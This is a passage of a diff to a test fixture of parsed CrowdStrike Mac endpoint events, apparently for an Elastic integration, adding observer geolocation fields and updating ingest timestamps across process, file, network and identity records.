"{\"FeatureVector\":\"000000527b2276223a22312e30222c226e223a352c226c223a3235362c2265223a7b2261223a5b31363737373232332c31363737373232332c31363737373232332c31363737373232332c31363737373232335d7d7d3f48793e3f6837b53f276c8b3ef8d4fe3f036e2f3fdb404f3e361134404d8c7e3df27bb33ef837b53faa57a83e752546402e6b513eb8e2193f5e63203e1446743f295e9e401fb7e93fe010623f90be0e3f6f837b3e7333333f3951833f33afb83e3f62b73e1893753f1b851f3ea752543e9333333ed446743f045a1d40889ba64065d2f2ad9a1b883f573eab3dd773193ed254613f3f3b643eedab9f3f579a6b4082b5dd3f92d42c3e8809d54040fcf83f90a71e40d717593e832ca53e19e83e3b4b295f3f64c2f83f8a9d1f3f27fcb93f088ce73e7333333de944673e81d7dc3f2db22d3e90cb293e2ca57a3e22b6ae3e843fe63f44fdf43f0573eb3ecbc6a83c648e8a3ceb1c433d16c6153c0d4fdf3d0529353e08ce703c2d81ae3f0809d53b69a2c63b7b43d93ded91683ba90cd43e2f9db23b6e28673d646499bb84406c3c0bd6623ea809d53edfb15b3dcc73acbc188d2a3c20cae63d390eaa3d148fda398cfb263b872b023d4d2b2c3a19c60fbc58ec963af9b13139f75bed3f687fcc3f105bc0ae9de3cf3cfb15b53a5dcccfbc2398203c9f40a3ba91e2153d0ec95c3f7e00d23dd048173c13b7d83f3404ea3ef06f69400392643c4dc8753b1f9485bb875d573cdebd903e1a9fbe3be83a113b1528f23c9279143c40053e3b62089e3d06ec183d16e58aba9c7ffe3b30c0273c3cbe623cc9eecc3b1e55c1ba25558f35192b55bcba493d357b1f123422c77e35700fd4349540073385f5c53562b199363180c1bbb5f5f133702cb134553ec134453f1234dfedcabba8e2e3bc4df26734da8f6636e51c133592f7ea34116278be173eabbc11ea79bbb3d4ae3574e4c733a4bbc53046530d34fd74ee330432f8bcf212d7bbaf3e47bc46690534a8a19335420670af1ab38734cdff54338e0e59bd23ad1934a8bd10bd2bb44e3433be90390220d73590265c3481ec3abb7701543b3e1eb437841ede333ede4c31d582ecbc195ee13510b6ab35ab6563b85ae696bcc582563510d9083490265c319cda2abc8327673428415ebba593a3347763df2f713b9cbd14a4d33486ea69bca3ec033d58ec963dc523f63dba7daa3cab9f563d5c67e03e8425af3cdaf8df3f47381d3bab606b3d174e663e6b1c433c4710cb3f04d0143c9691a73e0a233a3bde2ac33d0240b83ee339c13f139c0f3e2fec573df34d6a3d00e6b03df1a9fc3d9fb3fa3b6629953c4100e73d89fe873c0811b23d2d2dcb3ce5de163d0a1dfc3fac816f3f5096bc2e0d65af3df559b43b38ae323cf6555c3d93c3613d78a0903de872b03eb439583e27ef9e3c1689443f7c8b443eb06f694010ce703cff822c3c2d81ae3b0e68e43db5e2043e6b367a3d355ef23d1b089a3c5898b33bd373b03c41d29e3decbfb13d8a0e413bd9dfdb3c2dab9f3d1fddec3dcdd2f23cd10f523ce9ccb83f4b2fec3f7119ce3f276c8b3ee831273f036e2f3fe58adb3e361134404d8c7e3df972473ef837b53faab3683e7f1412402f34d73eb8e2193f62339c3e1446743f2041894013e0df3fe010623f90be0e3f6f837b3e7333333f449ba63f30a3d73e3f62b73e1893753f1b851f3ee240b83e9333333ed446743f03d07d40889ba64065d2f2ad8f49d23f4fd8ae3dd14e3c3edde69b3f3e147b3ee5bc023f579a6b409780343f92d42c3e8809d540435f703f90a71e40d717593e832ca53e19b3d03cc13fd13f6374bc3f8a9d1f3f27fcb93f1cd35b3e7333333de388663e884b5e3f29999a3e90cb293e2305533e2147ae3e843fe63f4d013b3f056d5d3ebe28243c6703b03cf084623d14a4d33c093b7e3d05a7093e087fcc3c304ab63f08c7e33b6ad0c43b8893b83dec22683ba8e2e33e2c56d63b6cd8dc3d637de9bb849cb23c08e79b3ea6dc5d3ee00d1b3dcb923abc1fd36f3c1cf56f3d385c683d134acb398c098e3b872b023d4e075f3a108bd4bc564d7f3b029cfe399cd0863f6958103f10b780ae9e16793cf601793a58523cbc231e7e3c9eecc0ba8398a63d0fba883f7d63883dd254613c14c4483f349ba63ef0b0f24003aa263c49afe23b23d70abb875d573cde3fbc3e1a9fbe3bebcc6c3b19d0203c92641b3c402f303b62d1f23d0366513d1797ccba9f40a33b32c83f3c39a1773ccfe9b83b2276b8ba786f1235192b55bcb890d63573a8ab34a531f734c11ccb3495400732a151a8369df96936179953bbbc1f00340207b734553ec134b523e7352bd356bba8e2e3bc4df26733a7cdeb36e51c1335421b0e3515c299be173eabbc11e647bbb3d4ae328448f533aa5c213046530d357f25dd330432f8bcf290acbbae9ee4bc4669053496f7d534ede333af1ab38733a03ec7346522f2bd23ad19353fd9cfbd2bb44e3392336039250bbe34bb34f73618f0ecbb7701543c50e560356884d0330f9fab31d582ecbc19f5e03510b6ab34e35d66b85ac660bcc582563510d9083490265c3399a707bc84a0e43474d02abba593a3342f209630b98ae7bd11fb4033605e7dbc9e59f33d5f11733dc922533db943183ca5a46a3d5b42463e83bcd33cdd2f1b3f47fcb93bae3a3b3d1ceaf23e6978d53c4836653f03a29c3c9afe1e3e096bba3bde76423cfd4bf13ee1e4f73f1418933e2ee6323df1a9fc3cfe1da83df0d8453d9e7ea63b69f6a93c4083123d8a7c5b3c0266773d2e147b3ce978d53d08ce703facf41f3f510cb32e0d9dfa3df2b0213b2bd5dc3cf77af63d94ee393d782d383de978d53eb404ea3e288ce73c2209ab3f7c91d13eb0d8454010e2193cfc65413c2e53653b0ede553db674d13e6ae7d53d361bb03d1c23b83c579d0a3bd3176a3c4447c33dea161e3d8a67623bd477bc3c2f4f0e3d1e6eeb3dd07c853cd4e8fb3cded2893f42de013f6d4fdf3f276c8b3ee1e4f73f036e2f3fe58adb3e361134404d8c7e3df837b53ef18fc53faa57a83e781d7e402d53263eb8e2193f62339c3e1b089a3f204189400eb9f53fe010623f9395813f6a233a3e81ff2e3f41a9fc3f3013a93e2666663e17dbf53f1b851f3ec666663e9333333ed446743f0e560440889ba64065d2f2ad9a1b883f573eab3dd7a7873edde69b3f3f3b643eed42c43f6a30554087f62b3f92d42c3e83958140435f703f90a71e40d717593e832ca53e19ce073cd0917d3f6374bc3f8a9d1f3f26e9793f088ce73e7333333df34d6a3e8710cb3f34f7663ea20c4a3e1a02753e23bcd33e843fe63f3a36e33f0573eb3ec84b5e3c6685db3cef0ae53d17acc53c0b32cf3d05681f3e0831273c2ff6d33f0a29c73b6a9e6f3b88c60d3deecbfb3baa53fc3e2d91683b6c636b3d66d9bebb8533b13c0a0d353ea91d153ee275253dcc9d9dbc159e623c1d27c43d3ad18d3d145b6c3982b47b3b88051d3d4fe9b83a12e7cfbc579d0a3af0a5f0390a9f2b3f69db233f10b780ae9e5a073cfc26573a5a6b1bbc247ed03c9d7343ba9bb6aa3d0f66a53f7d49523dd35a863c151c5c3f35b5743ef1d14e40047f243c4d9e843b24095fbb87b99d3cdd82fd3e1c28f63beeae9f3b14812c3c91a75d3c40ad043b613f4b3d033c603d195033ba9d8c6d3b307d0b3c3d12453cd234ec3b25375dba904f6e35181195bcba493d35a2674934a531f7352bda363522229033be54dc337b157336151dabbbb5f5f1340207b7345d30d93421b49d34c2b91cbba8e2e3bc4df26733a7cdeb369116e13592f7ea34116278be173eabbc11e647bbb3d4ae328448f533b7f4153046530d359e3e2233d006d8bcf2cf96bbad9ad8bc466905351da01436249e38af17834033a03ec7346522f2bd1ddc1e35d36497bd2bb44e33bf0a47390220d734c2822235531fdebb73ba773c1888f8356884d0330f9fab31d533c2bc195ee135adf23935ab6563b85b06ccbcc84b5e3510d9083490265c33e590e6bc81450f33ce498bbba593a334d1f8602f713b9cbd1930be33605e7dbca3ec033d5d249e3dc85b183dbc115e3ca858793d5c33723e83afb83cdcc63f3f4916873bab47413d1cb6853e6b9f563c49320e3f03eab33c9afe1e3e0aa64c3bdfd6953cfac1d33ee3e4263f14af4f3e2f69443df3b6463cfeda663df2b0213d9faebc3b50678c3c4250723d8c00543c0151a43d2d0e563ce4f7663d0701113fad2bd43f5075f72e0e19d33df5f6fd3b2eb80f3cf487fd3d92e72e3d7842313de944673eb50b0f3e295e9e3c1fd36f3f7d6a163eb15b57401159b43d000a7c3c2d2dcb3b0ecd8e3db4e11e3e6c3c9f3d3adc0a3d1bb0603c52dcb13bd338f83c4100e73de9e1b13d8b53503bd6ece13c2cd9e83d201cd63dd1b7173cda12303cdc725c3f48793e3f6ded293f276c8b3f036e2f3f036e2f3fea0f913e361134404d8c7e3e0189373ef837b53fabc3613e7f62b7403012063eb79a6b3f5e63203e0d4fdf3f204189400de9e23fe010623f90be0e3f6a233a3e81ff2e3f3951833f30902e3e4275253e18793e3f1b851f3ee0f9093e9333333ed446743f045a1d40889ba64065d2f2ad9d19253f573eab3dc692f73ece21963f3f3b643eee2eb23f579a6b407e76c93f92d42c3e83958140435f703f90a71e40d717593e832ca53e25aee63cb7e9103f64c2f83f8a9d1f3f27fcb93f06a7f03e676c8b3de147ae3e884b5e3f27bb303e90cb293e3295ea3e21e4f73e81205c3f3fec573f0573eb3ebec56d3c633eff3cf1800a3d1389b53c0ac1903d0587943e06dc5d3c2efb2b3f095e9e3b67ddca3b80303c3dec8b443ba782903e30068e3b6bcc6c3d619b91bb836eb53c0bf7f03ea60aa63ee00d1b3dcc447cbc28c1553c1d55e73d36e2eb3d132b56399063903b8776813d4d7f0f3a15a1bdbc55cfab3b06f04a39c25a833f68f5c33f107c85ae9e10d83cf9335d3a594a8abc2276b83c9f16b1ba66e57d3d0e0c9e3f7dbf483dd1b7173c1435ad3f34bc6a3ef096bc4003689d3c49afe23b22fcf0bb87a8d63cde939f3e1aee633bedbb5a3b14f69d3c91e6473c402f303b64217d3d06cca33d183516ba9fe8683b33d4ae3c38f9b13cced9173b288f00ba5a42d7356eda97bcb9628d356e0c6f341b95cf341f3c6534ad5b0a32a151a8337b157335b2c72cbbb2852334900adf34553ec1346e5ee5347ab7febba8e2e3bc4df26733a7cdeb35cf19143592f7ea34c9a612be173eabbc11e647bbb3d4ae35219fff33b7f4153046530d348b7aa434677fadbcf290acbbaf2d80bc46690535a6b2cc3206f2a8af17834033a03ec7338e0e59bd1e83e435857ac3bd2bb44e33043df73927249d34bb34f735906b14bb780dc33c50e560361e0a98336f92c2320a0eb4bc19b2c435adf23935ab6563b85a4586bcc56d5d3510d9083490265c3399a707bc811b1e34cde3d7bba593a334aec0612fb676c6bd13be2333605e7dbca3ec033d59be4d3dc9667b3db83cf33ca7ef9e3d5c09813e8361133cdba0a53f485f073ba023213d191bc53e69fbe73c4059213f04dd2f3c9835163e0865953be38a7e3d0385c63ee1b08a3f142c3d3e2f9db23df0068e3cff6d333df06f693d9e7ea63b68fb013c4250723d8a4d2b3c0b007a3d2e924f3cea209b3d094c443faccccd3f50ded32e0d9dfa3df41f213b2dab9f3cf95d4f3d94a4d33d7991bc3de809d53eb532613e28db8c3c1afe1e3f7cd9e83eb0ff974010f0d83cfc3b4f3c2e53653b0ede553db6c3763e6bb98c3d35f1bf3d1a95423c53d85a3bcedd483c46bce83ded5cfb3d8ac0833bd0edc43c319a413d1e30013dd07c853cdcf0303ce243573f4ded293f69c77a3f13d70a3f036e2f3f036e2f3feaa3053e361134404d8c7e3df5c28f3ef02de03faa57a83e70d845402f5dcc3eb8e2193f62339c3df0068e3f204189400de9e23fe010623f90be0e3f6a233a3e7333333f4a85883f3318fc3e4000003e063f143f1b851f3ecb5dcc3e9333333ed446743f0e560440889ba64065d2f2ad8f49d23f573eab3dbeff193ed7f62b3f3f3b643eedab9f3f57d567409780343f9292a33e8395814041158c3f90a71e40d717593e832ca53e1a511a3c74c6e73f64c2f83f832cf93f26e9793f03a92a3e6872b03df34d6a3e884b5e3f3381d83ea20c4a3e1a02753e2353f83e825aee3f4d013b3f041f213ec240b83c6a4a8c3cf3a14d3d15b5743c091e213d059c8d3e08ce703c2f78ff3f0837b53b6a7ce13b815e393ded91683ba9cdc43e2d42c43b73dc053d6147aebb8438093c0a61173ea72b023edf559b3dcaff6dbc1bd4063c21fd153d39ffd63d128e0d398d4bad3b894c443d4f18013a195aafbc5773193af57f7339ce41413f6851ec3f0fec57ae9dfa533cfa58f73a5a0d27bc21943a3ca1dfb9ba5471063d0e56043f7dd2f23dd1b7173c14b3813f33dd983ef013a9400347d83c4ca2db3b245d42bb8733663ce243573e1b22d13bf47b673b0f32383c928e0d3c4059213b6304473d05143c3d176ddbba9aed573b3220793c3c6a7f3ccc4ef93b267621ba298e0334f8d6f4bcba493d35461af9342ca85e34c11ccb352222903385f5c5368e9b3935b2c72cbbb75ea6344cfa3134553ec134b523e734c2b91cbba8e2e3bc4df26734d636243705eeb9351ad56535332082be173eabbc11ea79bbb3d4ae35a82cc133a943c13046530d34fd74ee34677fadbcf27bb3bbad8a11bc4669053496f7d53580f4d6af1848493405e546338e0e59bd23ad193400bddcbd2bb44e33bf0a473927249d34c2822235531fdebb73ba773c626d4836cf4407330f9fab31d582ecbc1a027535b8af0035d13ed5b85ad11cbcc582563573cb0735d499d3319cda2abc8548aa3474d02abba593a3351ccb0c2f713b9cbd14a4d333605e7dbca3ec033d6108c43dc9e4503dba34443ca454de3d5a511a3e84816f3cdc09813f4773193bac3a863d1945b73e6b1c433c48de2b3f03e4263c9a415f3e08b4393bd8ba413d0073583ee1cac13f13a92a3e2e48e93df318fc3d0216c63df212d73d9d7dbf3b627e0f3c44ef893d8ba1f53c03e8573d2c9afe3ce5f30e3d0846203fac710d3f50c49c2e0d4f2a3df487fd3b306c443cf837b53d96ffc13d795d4f3de8db8c3eb4bc6a3e28a71e3c1fba453f7c56d63eb07c854010c63f3cfeb0753c3170503b0e68e43db977853e6bb98c3d3c7f783d19a4163c55f99c3bd1e96c3c4669053debb98c3d8a6ca03bde43ee3c2efb2b3d2007dd3dce075f3cdbb59e3ce75793b01aa501\",\"event_simpleName\":\"DeliverLocalFXToCloud\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"67.43.156.14\",\"ModelPrediction\":\"1436899696705536\",\"SHA256HashData\":\"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2\",\"Malicious\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"FeatureExtractionVersion\":\"2\",\"event_platform\":\"Mac\",\"FXFileSize\":\"502032\",\"Entitlements\":\"15\",\"name\":\"DeliverLocalFXToCloudMacV4\",\"PupAdwareDecisionValue\":\"12384657383358464\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"PupAdwareConfidence\":\"0\",\"EffectiveTransmissionClass\":\"1\",\"aid\":\"ffffffff45d647e6ae0ba8764a4bd570\",\"MLModelVersion\":\"4\",\"timestamp\":\"1625677489052\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b44e-069a02b0ad6b", "created": "2021-07-07T17:04:49.052Z" @@ -3287,12 +3755,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffb3a3442585c05abc61e290fc", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffb3a3442585c05abc61e290fc", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:24.929Z", "file": { @@ -3316,7 +3793,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150854800Z", + "ingested": "2021-12-14T14:41:26.533767662Z", "original": "{\"event_simpleName\":\"CreateProcessArgs\",\"ContextTimeStamp\":\"1625677524.929\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365035560818271291\",\"ContextThreadId\":\"365035560818271291\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"CommandLine\":\"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules\",\"Entitlements\":\"15\",\"name\":\"CreateProcessArgsMac\",\"id\":\"ffffffff-1111-11eb-8332-020506b18db5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffb3a3442585c05abc61e290fc\",\"timestamp\":\"1625677525128\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend\"}", "created": "2021-07-07T17:05:25.128Z", "kind": "state", @@ -3355,12 +3832,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffc4044541995bffd84b9df003", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffc4044541995bffd84b9df003", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:48.523Z", "file": { @@ -3385,7 +3871,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150861Z", + "ingested": "2021-12-14T14:41:26.533768060Z", "original": "{\"event_simpleName\":\"PdfFileWritten\",\"ContextTimeStamp\":\"1625677488.523\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364156540965623394\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"FileIdentifier\":\"05000001000000000000000000000000f1321d0000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PdfFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8903-022a1941b91f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffc4044541995bffd84b9df003\",\"timestamp\":\"1625677488576\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95\"}", "created": "2021-07-07T17:04:48.576Z", "kind": "event", @@ -3408,24 +3894,27 @@ } }, { - "os": { - "type": "macos" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:38.379Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -3445,7 +3934,7 @@ }, "event": { "action": "GroupIdentity", - "ingested": "2021-12-09T13:36:11.150867300Z", + "ingested": "2021-12-14T14:41:26.533768454Z", "original": "{\"event_simpleName\":\"GroupIdentity\",\"GID\":\"242\",\"AuthenticationUuidAsString\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"AuthenticationId\":\"1119489580471877843\",\"UserPrincipal\":\"user2@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1485\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GroupIdentityMacV2\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"timestamp\":\"1625677478379\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-9dc2-029257dbe83b", "created": "2021-07-07T17:04:38.379Z" @@ -3468,7 +3957,13 @@ "group": { "id": "242" } - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -3487,12 +3982,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T01:50:11.845Z", "file": { @@ -3523,7 +4027,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150873600Z", + "ingested": "2021-12-14T14:41:26.533768897Z", "original": "{\"event_simpleName\":\"MachOFileWritten\",\"ContextTimeStamp\":\"1625622611.845\",\"ConfigStateHash\":\"3967242894\",\"MachOSubType\":\"3\",\"ContextProcessId\":\"364938429384226082\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"SHA256HashData\":\"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198\",\"FileIdentifier\":\"04000001000000000000000000000000ac41270400000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"MachOFileWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677479336\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl\"}", "created": "2021-07-07T17:04:39.336Z", "kind": "event", @@ -3575,12 +4079,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T01:50:08.014Z", "ecs": { @@ -3600,7 +4113,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150879900Z", + "ingested": "2021-12-14T14:41:26.533769296Z", "original": "{\"event_simpleName\":\"NetworkListenIP6\",\"ContextTimeStamp\":\"1625622608.014\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"ConfigStateHash\":\"3967242894\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364938390018585510\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"8770\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP6MacV10\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677478929\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.929Z", "kind": "event", @@ -3626,17 +4139,23 @@ }, { "observer": { - "serial_number": "ffffffff62714a708030d494ca0a7e60", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff62714a708030d494ca0a7e60", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:02.693Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -3651,8 +4170,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150886200Z", + "ingested": "2021-12-14T14:41:26.533769686Z", "original": "{\"event_simpleName\":\"CurrentSystemTags\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"SystemTableIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"CurrentSystemTagsMacV1\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff62714a708030d494ca0a7e60\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677502693\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:02.693Z", "kind": "state", @@ -3819,12 +4341,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff28414c2293e35c360213e723", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff28414c2293e35c360213e723", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:33.027Z", "file": { @@ -3853,7 +4384,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150892800Z", + "ingested": "2021-12-14T14:41:26.533770264Z", "original": 